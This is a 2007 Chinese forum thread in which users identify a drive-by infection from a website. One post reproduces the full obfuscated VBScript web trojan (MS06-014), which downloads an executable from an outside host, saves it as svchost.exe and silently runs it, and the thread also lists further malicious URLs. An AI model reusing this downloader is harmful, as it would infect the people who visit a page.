查看完整版本: [-- 上某网站 有中毒了 不知道是啥毒大家看看 --]

【 浮游城 - Castle in the Sky | 开放邀请注册,PS|SS|WII|DC下载研究中心 】 -> 【 幽幽茶馆 | Tea bar 】 -> 上某网站 有中毒了 不知道是啥毒大家看看 [打印本页] 登录 -> 注册 -> 回复主题 -> 发表主题

evaoo 2007-04-21 01:02

[attachment=53262]

yue 2007-04-21 01:31
VINKING 啊。

evaoo 2007-04-21 01:36
C盘扫描出的病毒
[attachment=53263]

这几天没怎么中毒 这下子全补上了

evaoo 2007-04-21 01:39
欢迎大家到 这网站上玩玩哦

http://www.skyhu.com/

yksoft1 2007-04-21 07:46
挂马,挂马,挂马。。。。到处都是ms06014,ms07004,ms07017...
http://s.gcuj.com/bd.htm?244001

<BODY style='CURSOR: url(http://s.gcuj.com/t.js)'>
07017
http://s.gcuj.com/1.htm
<SCRIPT language=VBScript>
on error resume next
fuckie = "http://t.gcuj.com/0.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, fuckie, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</SCRIPT>
06014

另外,golds7n的站上http://www.golds7n.cn/abc.htm也是个06014/07017混合网马
下载黑防鸽子

yksoft1 2007-04-21 08:18
PS:看到这堆文件,我也想起了什么。昨天有个朋友也是中了这个downloader,干掉一堆游戏木马、viking、灰鸽子

kofkofkofkof 2007-04-21 10:13
病毒真要人命!现在中毒的经常都是全盘感染


查看完整版本: [-- 上某网站 有中毒了 不知道是啥毒大家看看 --] [-- top --]


Powered by PHPWind Code © 2003-08 PHPWind
Gzip enabled

You can contact us